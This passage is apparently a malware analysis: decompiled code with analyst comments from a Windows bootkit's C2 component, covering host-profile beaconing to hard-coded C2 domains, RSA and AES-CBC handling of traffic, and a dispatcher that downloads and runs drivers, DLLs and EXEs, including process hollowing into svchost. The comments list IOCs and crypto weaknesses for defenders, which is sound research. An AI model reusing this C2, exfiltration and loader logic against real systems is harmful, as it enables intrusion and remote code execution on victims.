  //     eb:2e:2a:48:c2:b3:31:9c:96:9e:eb:6a:0c:d6:e6:
  //     55:bd:cc:2f:b8:ad:0f:5d:3c:0f:50:68:90:c3:69:
  //     76:aa:9b:c8:f5:0b:3d:bd:0f:ac:8f:fc:b9:bb:b7:
  //     6c:54:c8:2c:c7:46:3e:cc:41:31:ba:76:bd:f0:ea:
  //     aa:2b:cd:ae:57:7b:3a:24:7f:82:f4:d6:01:5f:f0:
  //     02:80:ed:ee:28:e7:9c:17:95:08:3f:db:1b:be:60:
  //     24:6d:ab:3d:3b:e2:87:e6:4c:b6:11:7a:05:6c:be:
  //     7b:47:a3:0b:72:72:7e:b9:86:b0:e5:66:c6:ad:2f:
  //     b7:6b:0c:c6:f4:a3:a6:1b:01:d2:a9:bc:99:96:0e:
  //     a1:3f:d7:a2:df:0c:2c:ef:38:f4:e3:14:16:a2:37:
  //     44:0a:48:ae:0f:cc:bc:00:ec:28:29:c2:ba:26:32:
  //     d0:8c:9e:e7:9c:8b:ea:79:46:dd:2a:df:3f:6e:62:
  //     d6:e2:31:3c:1d:4d:83:53:d9:fb:ef:45:04:0e:34:
  //     50:59:65:84:57:c9:a7:87:76:93:b4:7a:c8:9d:86:
  //     a5:e6:98:15:cd:23:5c:1d:d4:cc:3c:b3:35:54:0e:
  //     8f:79:29:61:c7:5c:e0:55:61:71:e4:d5:d6:22:c9:
  //     5e:98:56:45:96:a6:4b:0e:ac:ac:ce:9b:36:11:d8:
  //     f1:cd:bf:01:55:34:2b:8a:2c:9e:4a:48:7c:8f:97:
  //     24:16:11:0f:1d:85:5c:d0:8c:c3:1c:51:83:a2:af:
  //     b4:61:e8:b8:d3:65:3b:1d:ec:fb:32:a6:7c:10:7d:
  //     9d:c7:3d:7e:c8:f6:6c:16:a9:83:f2:42:a3:9e:1f:
  //     68:e8:88:a4:b4:1e:35:5c:b8:f3:59:8a:de:84:30:
  //     79:c5:ea:1e:e5:25:3f:fe:17:7a:ed:85:2f:c2:7d:
  //     03:34:f3:f6:64:4b:85:47:d0:cb:a6:72:71:43:bf:
  //     a0:ef:d0:73:92:cb:a9:61:52:c9:d2:f7:05:b8:9b:
  //     c9:28:f3:db:dc:0e:e1:dd:8f:24:98:a5:3c:f1:07:
  //     cb:55:58:9d:92:c2:e8:83:0c:9a:eb:f4:fa:15:6f:
  //     8b:d5:d5:69:a4:12:3a:72:78:b1:5b:2d:c1:40:96:
  //     28:37:6d:05:c9:0e:a8:f6:9b:66:1a:ce:86:55:5c:
  //     96:85:03:79:59:c1:51:c6:17:d9:1a:82:cb:88:ca:
  //     d9:15:b8:50:a8:38:1d:d7:d3:b9:f7:5a:6c:9a:d2:
  //     4d:d2:7d:cf:37:9c:15:2e:b2:51:e4:97:da:41:9b:
  //     1a:96:f2:5b:bf:31:ff:ff:0a:b3:7b:3e:81:eb:14:
  //     d8:87
  // Exponent: 65537 (0x10001)
  // The modulus is an unusual 4095 bits (top bit clear).  The DER SPKI of such
  // a key is 549 bytes, which matches the 4*128 + 32 + 4 + 1 bytes the unrolled
  // copy below moves into pbEncoded.
  v7 = rsakey_X509_14000A0D0;
  do
  {
    v8 = *((_OWORD *)v7 + 1);
    *(_OWORD *)v6 = *(_OWORD *)v7;
    v9 = *((_OWORD *)v7 + 2);
    *((_OWORD *)v6 + 1) = v8;
    v10 = *((_OWORD *)v7 + 3);
    *((_OWORD *)v6 + 2) = v9;
    v11 = *((_OWORD *)v7 + 4);
    *((_OWORD *)v6 + 3) = v10;
    v12 = *((_OWORD *)v7 + 5);
    *((_OWORD *)v6 + 4) = v11;
    v13 = *((_OWORD *)v7 + 6);
    *((_OWORD *)v6 + 5) = v12;
    v14 = *((_OWORD *)v7 + 7);
    v7 += 128;
    *((_OWORD *)v6 + 6) = v13;
    v6 += 128;
    *((_OWORD *)v6 - 1) = v14;
    --v4;
  }
  while ( v4 );                                 // 0x80*4

  v15 = *((_DWORD *)v7 + 8);                    // tail of the blob: 32 + 4 + 1 bytes
  v16 = *((_OWORD *)v7 + 1);
  *(_OWORD *)v6 = *(_OWORD *)v7;
  *((_OWORD *)v6 + 1) = v16;
  *((_DWORD *)v6 + 8) = v15;
  v6[36] = v7[36];
  v17 = WideCharToMultiByte(CP_UTF8, 0, indata, -1, 0i64, 0, 0i64, 0i64);// size query; -1 => length includes the NUL
  sz = v17;
  if ( v17 )
  {
    lpMultiByteStr = (CHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v17);
    pbInput = (UCHAR *)lpMultiByteStr;
    if ( lpMultiByteStr )
    {
      if ( WideCharToMultiByte(CP_UTF8, 0, indata, -1, lpMultiByteStr, sz, 0i64, 0i64) )// TO UTF8
      {
        // RSA
        v20 = deobfuscate_wstring(word_14000A068, 4u, 1);
        if ( BCryptOpenAlgorithmProvider(&v25, v20, 0i64, 0) >= 0 )
        {
          if ( CryptDecodeObjectEx(
                 0x10001u,                      // X509_ASN_ENCODING | PKCS_7_ASN_ENCODING
                 (LPCSTR)X509_PUBLIC_KEY_INFO,
                 pbEncoded,
                 pcbStructInfo,
                 0x8005u,                       // CRYPT_DECODE_ALLOC_FLAG|CRYPT_DECODE_NOCOPY_FLAG|CRYPT_DECODE_SHARE_OID_STRING_FLAG
                                                // #define CRYPT_DECODE_NOCOPY_FLAG            0x1
                                                // #define CRYPT_DECODE_SHARE_OID_STRING_FLAG  0x4
                                                // NOCOPY means the decoded struct may point back into pbEncoded,
                                                // which is fine here because it is consumed before this frame unwinds
                 0i64,
                 &pvStructInfo,
                 &pcbStructInfo) )
          {
            // X509_ASN_ENCODING
            if ( CryptImportPublicKeyInfoEx2(1u, pvStructInfo, 0, 0i64, &phKey) )
            {
              // Size query (status unchecked).  sz - 1 drops the trailing NUL.
              // With a 4095-bit modulus the RSA block is 512 bytes, so PKCS#1 v1.5
              // caps the plaintext at 512 - 11 = 501 bytes; a longer `indata` makes
              // this call fail, leaves pcbResult == 0 and the function returns NULL.
              BCryptEncrypt(phKey, pbInput, sz - 1, 0i64, 0i64, 0, 0i64, 0, &pcbResult, BCRYPT_PAD_PKCS1);
              Heap = (BYTE *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, pcbResult);
              if ( Heap )
              {
                if ( BCryptEncrypt(phKey, pbInput, sz - 1, 0i64, 0i64, 0, Heap, pcbResult, &pcbResult, BCRYPT_PAD_PKCS1) >= 0 )
                {
                  // size query for the base64 text (pcchString includes the NUL)
                  CryptBinaryToStringA(Heap, pcbResult, 0x40000001u, 0i64, &pcchString);
                  if ( pcchString )
                  {
                    // ANSI output, yet 2 * (len + 1) bytes are allocated - harmless over-allocation
                    v2 = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (pcchString + 1));
                    if ( v2 )
                    {
                      // CRYPT_STRING_NOCRLF
                      // 0x40000000

                      // CRYPT_STRING_BASE64
                      // 0x00000001
                      if ( !CryptBinaryToStringA(Heap, pcbResult, 0x40000001u, (LPSTR)v2, &pcchString) )
                      {
                        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v2);
                        v2 = 0i64;
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }

  if ( phKey )
    BCryptDestroyKey(phKey);

  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  // NOTE(review): CRYPT_DECODE_ALLOC_FLAG memory is documented as LocalAlloc'd
  // and should be released with LocalFree; RtlFreeHeap on the process heap
  // presumably works in practice because fixed LocalAlloc blocks come from
  // that heap, but it is not the documented pairing.
  if ( pvStructInfo )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pvStructInfo);

  if ( pbInput )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pbInput);

  return (CHAR *)v2;
}

urlenc_140005498

_BYTE *__fastcall urlenc_140005498(_BYTE *data, int flag)
{
  _BYTE *Heap; // rsi
  unsigned int size; // edi
  _BYTE *i; // rax
  int v7; // ebx
  char *v8; // r8
  __int64 v9; // r9
  char v10; // cl
  __int64 v11; // rdx
  _BYTE *v12; // rax
  __int64 v13; // rbx

  // Minimal form-URL encoder: escapes only '+', '/' and '=' (as %2B, %2F, %3D)
  // and copies every other byte unchanged.  Those three are exactly the
  // non-alphanumeric characters of standard base64, so this is a
  // base64 -> application/x-www-form-urlencoded adapter, not a general encoder.
  // Returns a new zero-filled heap buffer (HEAP_ZERO_MEMORY, so it is
  // NUL-terminated) or NULL for an empty input / allocation failure.
  // `flag` non-zero releases `data` before returning (ownership transfer).
  Heap = 0i64;
  size = 0;
  for ( i = data; *i; ++size )                  // strlen by hand
    ++i;

  v7 = 0;                                       // write offset
  if ( size )
  {
    // worst case every byte expands to 3 ("%XX"): 3*size + 1 for the NUL
    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, size + 2 * size + 1);
    if ( Heap )
    {
      v8 = data;
      v9 = size;                                // bytes remaining
      // urlenc
      while ( 1 )
      {
        v10 = *v8;
        v11 = (unsigned int)(v7 + 1);
        v12 = &Heap[v7];
        if ( *v8 == '+' )
        {
          *v12 = '%';
          v13 = (unsigned int)(v7 + 2);
          Heap[v11] = '2';
          Heap[v13] = 'B';
          goto LABEL_13;
        }

        if ( v10 == '/' )                       // handled after the loop (compiler moved the '%2F' case out of line)
          break;

        if ( v10 == '=' )
        {
          *v12 = '%';
          v13 = (unsigned int)(v7 + 2);
          Heap[v11] = '3';
          Heap[v13] = 'D';

LABEL_13:
          v7 = v13 + 1;                         // consumed 3 output bytes
          goto LABEL_14;
        }

        *v12 = v10;                             // pass-through byte
        ++v7;

LABEL_14:
        ++v8;
        if ( !--v9 )
          goto LABEL_15;
      }

      *v12 = '%';
      v13 = (unsigned int)(v7 + 2);
      Heap[v11] = '2';
      Heap[v13] = 'F';
      goto LABEL_13;
    }
  }

LABEL_15:
  if ( flag )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, data);

  return Heap;
}

do_1400049F4

先把收集到的主机信息 POST 给 C2，再接收并解析 C2 下发的指令（响应以 2 字节魔术字 'HP' 开头，其余为 base64 编码的 AES-CBC 密文）

__int64 __fastcall do_1400049F4(HttpST *httpst, _BYTE *data)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // One C2 round trip: POST the prepared host profile (`data`, an ANSI
  // form-encoded body) to the current C2 host, then read, authenticate and
  // decrypt the task reply and hand it to docommand_140006A38.
  // Reply format: 2-byte magic 'HP' + base64(AES-256-CBC(tasks)).  The AES key
  // is the 32-character MD5 hex string of the host's MAC + volume serial
  // (get_HWID_MAC_VolumeSerialNumber_md5wstr), i.e. it is derivable by anyone
  // who knows the victim host - a defender holding the HWID can decrypt
  // captured tasking offline.
  // Returns the error code produced by docommand (0 unless set there), or 2 when
  // no C2 host could be selected.  Every failure path goes through ROUND, which
  // bumps httpst->RoundIndex; init_httpst_140004614 uses that counter to decide
  // when to rotate to the next hard-coded host.
  Str = data;
  data_1 = 0i64;                                // raw reply buffer
  v23 = 4;                                      // sizeof(DWORD) for the status-code query
  v28 = 0;                                      // HTTP status code
  LODWORD(recvsize) = 0;
  wstr1 = 0i64;                                 // widened plaintext handed to docommand
  decsz = 0;
  ws = 0i64;                                    // HWID MD5 hex (wide)
  errorcode = 0;
  if ( !(unsigned int)init_httpst_140004614(httpst) )
  {
    errorcode = 2;                              // all hosts exhausted (index > 2) or allocation failure
    goto ROUND;
  }

  hConnect = WinHttpConnect(
               httpst->hSession,
               httpst->DataST_20.pswzServerName,
               httpst->DataST_20.sslflag != 0 ? 443 : 80,
               0);
  p_hConnect = &httpst->hConnect;
  httpst->hConnect = hConnect;
  if ( !hConnect )
    goto ROUND;

  // #define WINHTTP_FLAG_SECURE                0x00800000  // use SSL if applicable (HTTPS)

  // #define WINHTTP_FLAG_BYPASS_PROXY_CACHE    0x00000100 // add "pragma: no-cache" request header
  dwFlags = httpst->DataST_20.sslflag != 0 ? 0x800100 : 0x100;
  // POST
  pwszVerb = deobfuscate_wstring(POST_14000AFE0, 5u, 1);
  hRequest = WinHttpOpenRequest(httpst->hConnect, pwszVerb, httpst->DataST_20.pwszObjectName, 0i64, 0i64, 0i64, dwFlags);
  p_hRequest = &httpst->hRequest;
  httpst->hRequest = hRequest;
  if ( !hRequest )
    goto ROUND;

  // 0x3300 = SECURITY_FLAG_IGNORE_UNKNOWN_CA (0x100) | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE (0x200)
  //        | SECURITY_FLAG_IGNORE_CERT_CN_INVALID (0x1000) | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID (0x2000)
  // => the TLS server is not authenticated at all.  Any certificate is accepted, so the
  // channel can be intercepted or sinkholed with a self-signed cert; the only check a
  // forged reply has to pass is the 'HP' magic plus a clean AES decrypt under the
  // HWID-derived key described above.
  SECURITY_flag = 0x3300;
  // #define WINHTTP_OPTION_SECURITY_FLAGS                   31
  if ( !WinHttpSetOption(hRequest, 0x1Fu, &SECURITY_flag, 4u) )
    goto ROUND;

  // Content-Type: application/x-www-form-urlencoded
  v11 = deobfuscate_wstring(Content_Type_14000AFF0, 0x30u, 1);
  v12 = strlen(Str);                            // dwTotalLength
  v13 = strlen(Str);                            // dwOptionalLength (same body; no streaming)
  if ( !WinHttpSendRequest(*p_hRequest, v11, 0xFFFFFFFF, Str, v13, v12, 0i64) )// 0xFFFFFFFF = -1L: header is NUL-terminated
    goto ROUND;

  if ( !WinHttpReceiveResponse(*p_hRequest, 0i64) )
    goto ROUND;

  // 0x20000013 = WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER
  if ( !WinHttpQueryHeaders(*p_hRequest, 0x20000013u, 0i64, &v28, &v23, 0i64) )
    goto ROUND;

  if ( v28 != HTTP_STATUS_OK )
    goto ROUND;

  // C2 reply: magic 'HP', then base64(AES-CBC ciphertext).  The chain below
  // short-circuits to ROUND on the first failed step.
  recvdata = (char *)get_HttpReadData(*p_hRequest, (unsigned int *)&recvsize);
  data_1 = recvdata;
  if ( !recvdata
    || (recvsize1 = recvsize, (unsigned int)recvsize < 2)
    || *recvdata != 'H'
    || recvdata[1] != 'P'
    || (HWID_MAC_VolumeSerialNumber_md5wstr = get_HWID_MAC_VolumeSerialNumber_md5wstr(),
        (ws = HWID_MAC_VolumeSerialNumber_md5wstr) == 0i64)
    || (unsigned int)wcslen(HWID_MAC_VolumeSerialNumber_md5wstr) != 32  // MD5 hex digest, used verbatim as the 32-byte AES key
    || (wstr2str_140005380(ws, s),
        (decdata = (char *)AESCBC256_dec_recvdata_140001060(data_1 + 2, s, recvsize1 - 2, &decsz)) == 0i64)
    || !decsz
    || (wstr = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(decsz + 10)),// zeroed, +10 wide chars of slack
        (wstr1 = wstr) == 0i64) )
  {
ROUND:
    ++httpst->RoundIndex;                       // failure counter consulted by init_httpst_140004614
    v19 = &httpst->hConnect;
    p_hRequest = &httpst->hRequest;
    if ( !ws )
      goto LABEL_22;

    goto LABEL_21;
  }

  str2wstr_140005424(decdata, wstr);
  docommand_140006A38(httpst, wstr1, &errorcode);// NOTE: decdata itself is not freed on this path (leak of the decrypted buffer)
  v19 = p_hConnect;

LABEL_21:
  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, ws);

LABEL_22:
  if ( wstr1 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, wstr1);

  if ( data_1 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, data_1);

  if ( *v19 )
  {
    WinHttpCloseHandle(*v19);
    *v19 = 0i64;
  }

  if ( *p_hRequest )
  {
    WinHttpCloseHandle(*p_hRequest);
    *p_hRequest = 0i64;
  }

  return errorcode;
}

init_httpst_140004614

轮询 C2 host：按 index 依次使用三个内置的 host/path 组合，只有在上一轮失败（RoundIndex 与 index 不再相等）后才切换到下一个

__int64 __fastcall init_httpst_140004614(HttpST *httpst)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Selects the C2 endpoint for the next round.  Three hard-coded entries are
  // rebuilt on every call (two of them share heikickgn.com); all use HTTPS and
  // the same path /API/hpb_gate.php.  If httpst->RoundIndex still equals
  // DataST_20.index the current host is kept; otherwise the previous buffers
  // are released and the next entry is copied into DataST_20.  Returns 1 on
  // success, 0 once index passes 2 (all hosts tried) or an allocation fails,
  // which the caller turns into error code 2.  Initial values of RoundIndex
  // and index are set outside this view.
  // IOC: frassirishiproc.com, heikickgn.com, path /API/hpb_gate.php.
  v1 = 0;
  ptr = &httpst->DataST_20;
  // The two strings below are decoded and the results discarded: an easter egg
  // aimed at researcher hasherezade with no functional use visible here.
  // I love you hasherezade <3
  deobfuscate_wstring(word_14000AE90, 0x1Au, 1);
  // I was secretly hoping we could be friends
  deobfuscate_wstring(word_14000AED0, 0x2Au, 1);
  // frassirishiproc.com
  urls[0].wshost = deobfuscate_wstring(frassirishiproc_com_14000AF28, 0x14u, 0);
  // /API/hpb_gate.php
  urls[0].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
  urls[0].sslflag = 1;
  urls[0].flag3 = 2;                            // meaning of flag3 not visible here; never copied into DataST_20
  // heikickgn.com
  urls[1].wshost = deobfuscate_wstring(heikickgn_com_14000AF80, 0xEu, 0);
  urls[1].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
  urls[1].sslflag = 1;
  urls[1].flag3 = 3;
  urls[2].wshost = deobfuscate_wstring(heikickgn_com_14000AF80, 0xEu, 0);
  urls[2].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
  index = ptr->index;
  urls[2].sslflag = 1;                          // urls[2].flag3 is left unset
  if ( httpst->RoundIndex == index )            // no failure since the last rotation: keep the current host
    return 1;

  freebuf_1400073F4(ptr);                       // presumably releases the previous pswzServerName/pwszObjectName
  i = ptr->index;
  if ( ptr->index <= 2u )
  {
    i1 = i;
    ptr->index = i + 1;
    v7 = wcslen(urls[i1].wshost);
    Heap = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v7 + 1));
    ptr->pswzServerName = Heap;
    if ( Heap )
    {
      v9 = wcslen(urls[i1].wspath);
      v10 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v9 + 1));
      ptr->pwszObjectName = v10;
      if ( v10 )
      {
        if ( urls[i1].wshost && urls[i1].wspath )// NULL check comes after wcslen() already dereferenced both - order is backwards
        {
          // the decompiler's wcsncpy_0 prototype is wrong; the arguments are (dst, count, src) for a bounded copy
          v11 = wcslen(urls[i1].wshost);
          wcsncpy_0(ptr->pswzServerName, (const wchar_t *)(unsigned int)(v11 + 1), (size_t)urls[i1].wshost);
          v12 = wcslen(urls[i1].wspath);
          wcsncpy_0(ptr->pwszObjectName, (const wchar_t *)(unsigned int)(v12 + 1), (size_t)urls[i1].wspath);
          ptr->sslflag = urls[i1].sslflag;
          return 1;
        }
      }
    }
  }

  // NOTE(review): on the failure paths the buffers already stored in DataST_20
  // are left allocated; they are presumably reclaimed by the next freebuf call.
  return v1;
}

AESCBC256_dec_recvdata_140001060

PVOID __fastcall AESCBC256_dec_recvdata_140001060(const CHAR *data, UCHAR *key, DWORD datasz, _DWORD *decsz)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Decrypts a C2 reply: base64-decode `data` (datasz bytes), then
  // AES-256-CBC decrypt with PKCS#7 block padding under the 32-byte `key`.
  // pbIV is passed as NULL, which with BCrypt amounts to an all-zero IV.
  // Returns a zero-filled heap buffer of *decsz + 10 bytes holding the
  // plaintext (so it is NUL-terminated for the caller's str2wstr), or NULL.
  // *decsz is only written on success - callers must pre-initialise it.
  // Crypto notes for defenders: the caller feeds the 32 ASCII hex characters of
  // an MD5 digest as the key, so the effective key space is 128 bits and, worse,
  // fully determined by the victim's MAC + volume serial.  No authentication tag
  // is checked, so a forged reply is only rejected if padding happens to be bad.
  v21 = 0i64;                                   // BCRYPT_ALG_HANDLE ("AES")
  v22 = 0i64;                                   // BCRYPT_KEY_HANDLE
  v17 = 0;                                      // decoded ciphertext length
  v18 = 0;                                      // plaintext length
  v19 = 0;                                      // key-object size (ObjectLength)
  v8 = 0i64;                                    // result
  v20 = 0;
  v9 = 0i64;                                    // key-object buffer
  CryptStringToBinaryA(data, datasz, 1u, 0i64, &v17, 0i64, 0i64);// 1 = CRYPT_STRING_BASE64; size query
  if ( v17 )
  {
    Heap = (UCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v17);
    if ( Heap )
    {
      if ( CryptStringToBinaryA(data, datasz, 1u, Heap, &v17, 0i64, 0i64) )
      {
        // AES
        v11 = deobfuscate_wstring(word_14000A078, 4u, 1);
        if ( BCryptOpenAlgorithmProvider(&v21, v11, 0i64, 0) >= 0 )
        {
          // ChainingModeCBC
          v12 = (UCHAR *)deobfuscate_wstring(word_14000A088, 0x10u, 0);
          // ChainingMode
          v13 = deobfuscate_wstring(word_14000A0B0, 0xDu, 0);
          // 0x20 bytes = L"ChainingModeCBC" including its NUL (16 wide chars)
          if ( BCryptSetProperty(v21, v13, v12, 0x20u, 0) >= 0 )
          {
            // ObjectLength
            v14 = deobfuscate_wstring(ObjectLength_14000A010, 0xDu, 1);
            if ( BCryptGetProperty(v21, v14, (PUCHAR)&v19, 4u, &v20, 0) >= 0 )
            {
              v15 = (UCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v19);
              v9 = v15;
              if ( v15 )
              {
                // 0x20 = 32-byte secret => AES-256; the raw key bytes come from the caller
                if ( BCryptGenerateSymmetricKey(v21, &v22, v15, v19, key, 0x20u, 0) >= 0 )
                {
                  // size query; NULL IV; dwFlags 1 = BCRYPT_BLOCK_PADDING (PKCS#7)
                  BCryptDecrypt(v22, Heap, v17, 0i64, 0i64, 0, 0i64, 0, &v18, 1u);
                  if ( v18 )
                  {
                    // +10 slack, zero-filled (HEAP_ZERO_MEMORY) => plaintext is NUL-terminated
                    v8 = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v18 + 10);
                    if ( v8 )
                    {
                      if ( BCryptDecrypt(v22, Heap, v17, 0i64, 0i64, 0, (PUCHAR)v8, v18, &v18, 1u) >= 0 )
                      {
                        *decsz = v18;
                      }
                      else
                      {
                        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v8);
                        v8 = 0i64;
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
    }
  }

  // full teardown, including the provider handle (the RSA routine omits that step)
  if ( v22 )
    BCryptDestroyKey(v22);

  if ( v9 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v9);

  if ( v21 )
    BCryptCloseAlgorithmProvider(v21, 0);

  return v8;
}

docommand_140006A38

Type

1 加载 sys、exe、dll

2 通过 svchost.exe 进程镂空（process hollowing）加载 exe、dll，并卸载 bootkit

3 卸载 bootkit

Method == '2' 则先把文件保存到 ProgramData 再执行，'1' 则直接内存加载

char __fastcall docommand_140006A38(HttpST *httpst, wchar_t *recvdata, _DWORD *isSuccess)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Task dispatcher for a decrypted C2 reply.  Reads the beacon "interval"
  // first, then walks the task list: getValue_and_Aeskey_140007090 extracts one
  // task into `wsvalue` and returns a cursor past it (NULL when no further task
  // parses), and the first character of Type selects the handler.  Iteration
  // stops when a task sets *isSuccess to 1 (only types 2 and 3 receive that
  // pointer; type 1 cannot end the loop) or when parsing fails.
  // The return value is the low byte of whatever the last expression yielded
  // (the RtlFreeHeap result, or 0 if no interval was found) - not a status; the
  // caller do_1400049F4 ignores it and relies on *isSuccess instead.
  // The key strings are matched by substring, so this is a hand-rolled
  // extractor rather than a JSON parser (see getValue_and_Aeskey_140007090).
  memset(&wsvalue, 0, sizeof(wsvalue));
  // "interval":
  v6 = deobfuscate_wstring(word_14000B660, 0xCu, 1);
  v7 = getvalue_1400051A4(recvdata, v6);        // beacon interval, seconds, operator-controlled
  v8 = v7;
  if ( v7 )
  {
    v9 = 1000 * wtoi((const wchar_t *)v7);      // seconds -> ms; no range check, a huge value overflows int
    v10 = 60000;                                // default 60 s when the value is missing/zero
    if ( v9 )
      v10 = v9;

    httpst->sleep_dwMilliseconds = v10;
    do
    {
      recvdata = getValue_and_Aeskey_140007090(recvdata, &wsvalue);
      // every task must carry Type, Method, File, FileType, auth_token and aes_key
      // (cmd_line and User are also required inside the extractor)
      if ( !recvdata
        || !wsvalue.Type
        || !wsvalue.Method
        || !wsvalue.File
        || !wsvalue.FileType
        || !wsvalue.auth_token
        || !wsvalue.aes_key )
      {
        break;
      }

      switch ( *wsvalue.Type )
      {
        case '1':
          command_type1_140006318(httpst, &wsvalue);// Download and execute a kernel driver, DLL, or a regular executable
          break;

        case '2':
          command_type2_140006BB0(httpst, &wsvalue, isSuccess);// Download a payload, uninstall the bootkit, and execute the payload – likely used to update the bootkit
          break;

        case '3':                               // 'U'
          command_type3_140006B78(isSuccess);   // Uninstall the bootkit and exit
          break;
      }

      free_WsValue_14000744C(&wsvalue);
    }
    while ( *isSuccess != 1 );

    LOBYTE(v7) = RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v8);
  }

  return (char)v7;
}

getValue_and_Aeskey_140007090

wchar_t *Type;

wchar_t *Method;

wchar_t *File;

wchar_t *cmd_line_b64dec;

wchar_t *User;

wchar_t *FileType;

wchar_t *auth_token;

wchar_t *aes_key;

wchar_t *__fastcall getValue_and_Aeskey_140007090(const wchar_t *recvdata, WsValue *a2)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // Extracts one task object from the decrypted reply into `a2` by substring
  // matching on the quoted key names (not a real JSON parser).  Required keys:
  // Type, Method, File, FileType (>= 3 chars, because command_type1 compares
  // FileType[0..2] against "dll"/"exe"), User, auth_token, cmd_line (base64,
  // decoded into cmd_line_b64dec) and aes_key.  On success returns a cursor
  // just past the "aes_key":" marker (pattern length + 1), which the caller uses
  // as the start position for the next task; on any missing key or allocation
  // failure it frees everything already stored in `a2` and returns NULL.
  // The decoded cmd_line is copied verbatim - no length or content validation.
  aeskey = 0i64;                                // return value / cursor
  v24 = 0;                                      // decoded cmd_line length
  Heap = 0i64;                                  // decoded cmd_line (ANSI)
  memset(a2, 0, sizeof(WsValue));
  // {"Type":
  v6 = deobfuscate_wstring(word_14000B6F0, 9u, 1);
  v7 = getvalue_1400051A4(recvdata, v6);
  a2->Type = (wchar_t *)v7;
  if ( !v7 )
    goto LABEL_18;

  // "Method":
  v8 = deobfuscate_wstring(word_14000B708, 0xAu, 1);
  v9 = getvalue_1400051A4(recvdata, v8);
  a2->Method = (wchar_t *)v9;
  if ( !v9 )
    goto LABEL_18;

  // "File":"
  v10 = deobfuscate_wstring(word_14000B720, 9u, 1);
  v11 = getvalue_1400051A4(recvdata, v10);
  a2->File = (wchar_t *)v11;
  if ( !v11 )
    goto LABEL_18;

  // "FileType":"
  v12 = deobfuscate_wstring(word_14000B738, 0xDu, 1);
  v13 = getvalue_1400051A4(recvdata, v12);
  a2->FileType = (wchar_t *)v13;
  if ( !v13 )
    goto LABEL_18;

  if ( (unsigned int)wcslen((wchar_t *)v13) < 3 )// guards the 3-char "dll"/"exe" compares in command_type1
    goto LABEL_18;

  // "User":
  v14 = deobfuscate_wstring(word_14000B758, 8u, 1);
  v15 = getvalue_1400051A4(recvdata, v14);
  a2->User = (wchar_t *)v15;
  if ( !v15 )
    goto LABEL_18;

  // "auth_token":"
  v16 = deobfuscate_wstring(word_14000B770, 0xFu, 1);
  v17 = getvalue_1400051A4(recvdata, v16);
  a2->auth_token = (wchar_t *)v17;
  if ( !v17 )
    goto LABEL_18;

  // "cmd_line":"
  v18 = deobfuscate_wstring(word_14000B790, 0xDu, 1);
  v19 = getvalue_1400051A4(recvdata, v18);
  if ( !v19 )
    goto LABEL_18;

  // size query; cchString 0 => NUL-terminated input; 1 = CRYPT_STRING_BASE64
  CryptStringToBinaryW((LPCWSTR)v19, 0, 1u, 0i64, &v24, 0i64, 0i64);
  if ( v24 )
  {
    Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v24 + 10);// zeroed, +10 slack => NUL-terminated for str2wstr
    if ( Heap )
    {
      // CRYPT_STRING_BASE64
      // 0x00000001
      if ( CryptStringToBinaryW((LPCWSTR)v19, 0, 1u, (BYTE *)Heap, &v24, 0i64, 0i64) )
      {
        v20 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (v24 + 10));
        a2->cmd_line_b64dec = v20;
        if ( v20 )
        {
          str2wstr_140005424(Heap, v20);
          // "aes_key":"
          v21 = deobfuscate_wstring(word_14000B7B0, 12u, 1);
          v22 = getvalue_1400051A4(recvdata, v21);
          a2->aes_key = (wchar_t *)v22;
          if ( v22 )
            aeskey = wcsstr(recvdata, v21) + 12;// cursor for the next task: marker is 11 chars, so this lands one char into the value
        }
      }
    }
  }

  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v19);
  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( !aeskey )
LABEL_18:
    free_WsValue_14000744C(a2);                 // partial results are released; caller sees all-NULL fields

  return aeskey;
